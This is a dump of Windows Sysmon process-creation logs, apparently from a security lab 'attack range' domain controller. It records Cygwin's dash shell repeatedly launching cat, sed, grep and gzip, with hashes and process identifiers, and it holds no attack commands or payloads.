14:55:54.890{A8622C2F-53FA-6078-A408-00000000AE01}2664C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-A208-00000000AE01}6884C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047397Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.890{A8622C2F-53FA-6078-A308-00000000AE01}5832C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047385Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.883{A8622C2F-53FA-6078-A208-00000000AE01}6884C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047373Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.875{A8622C2F-53FA-6078-A108-00000000AE01}5444C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-A008-00000000AE01}5964C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047362Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.867{A8622C2F-53FA-6078-A008-00000000AE01}5964C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047350Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.859{A8622C2F-53FA-6078-9F08-00000000AE01}2084C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-9D08-00000000AE01}924C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047332Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.851{A8622C2F-53FA-6078-9E08-00000000AE01}3420C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-9B08-00000000AE01}3304C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047330Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.851{A8622C2F-53FA-6078-9D08-00000000AE01}924C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047311Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.844{A8622C2F-53FA-6078-9C08-00000000AE01}3368C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-9A08-00000000AE01}5404C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047310Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.844{A8622C2F-53FA-6078-9B08-00000000AE01}3304C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047297Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.836{A8622C2F-53FA-6078-9A08-00000000AE01}5404C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047285Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.828{A8622C2F-53FA-6078-9908-00000000AE01}5052C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-9808-00000000AE01}3136C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047275Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.821{A8622C2F-53FA-6078-9808-00000000AE01}3136C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047262Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.812{A8622C2F-53FA-6078-9708-00000000AE01}1140C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-9508-00000000AE01}6808C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047244Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.804{A8622C2F-53FA-6078-9608-00000000AE01}6440C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-9308-00000000AE01}2952C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047242Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.804{A8622C2F-53FA-6078-9508-00000000AE01}6808C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047223Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.797{A8622C2F-53FA-6078-9408-00000000AE01}6452C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-9208-00000000AE01}4604C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047222Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.797{A8622C2F-53FA-6078-9308-00000000AE01}2952C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047210Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.790{A8622C2F-53FA-6078-9208-00000000AE01}4604C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047198Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.782{A8622C2F-53FA-6078-9108-00000000AE01}5184C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-9008-00000000AE01}616C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047188Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.775{A8622C2F-53FA-6078-9008-00000000AE01}616C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047175Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.766{A8622C2F-53FA-6078-8F08-00000000AE01}4160C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-8D08-00000000AE01}4336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047157Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.759{A8622C2F-53FA-6078-8E08-00000000AE01}5444C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-8B08-00000000AE01}3220C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047155Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.758{A8622C2F-53FA-6078-8D08-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047137Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.751{A8622C2F-53FA-6078-8C08-00000000AE01}6748C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-8A08-00000000AE01}1628C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047135Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.751{A8622C2F-53FA-6078-8B08-00000000AE01}3220C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047123Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.744{A8622C2F-53FA-6078-8A08-00000000AE01}1628C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047111Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.736{A8622C2F-53FA-6078-8908-00000000AE01}5828C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-8808-00000000AE01}5108C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047100Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.729{A8622C2F-53FA-6078-8808-00000000AE01}5108C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047088Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.720{A8622C2F-53FA-6078-8708-00000000AE01}7140C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-8508-00000000AE01}4832C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047071Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.713{A8622C2F-53FA-6078-8608-00000000AE01}6064C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-8308-00000000AE01}4476C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047068Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.713{A8622C2F-53FA-6078-8508-00000000AE01}4832C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047050Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.706{A8622C2F-53FA-6078-8408-00000000AE01}3008C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-8208-00000000AE01}6332C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047048Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.706{A8622C2F-53FA-6078-8308-00000000AE01}4476C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047035Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.698{A8622C2F-53FA-6078-8208-00000000AE01}6332C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047023Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.690{A8622C2F-53FA-6078-8108-00000000AE01}5144C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-8008-00000000AE01}1348C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047013Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.683{A8622C2F-53FA-6078-8008-00000000AE01}1348C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047001Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.675{A8622C2F-53FA-6078-7F08-00000000AE01}4604C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-7D08-00000000AE01}6084C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046983Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.667{A8622C2F-53FA-6078-7E08-00000000AE01}5184C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-7B08-00000000AE01}1612C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046981Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.667{A8622C2F-53FA-6078-7D08-00000000AE01}6084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046963Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.660{A8622C2F-53FA-6078-7C08-00000000AE01}6240C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-7A08-00000000AE01}6336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046961Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.659{A8622C2F-53FA-6078-7B08-00000000AE01}1612C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046948Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 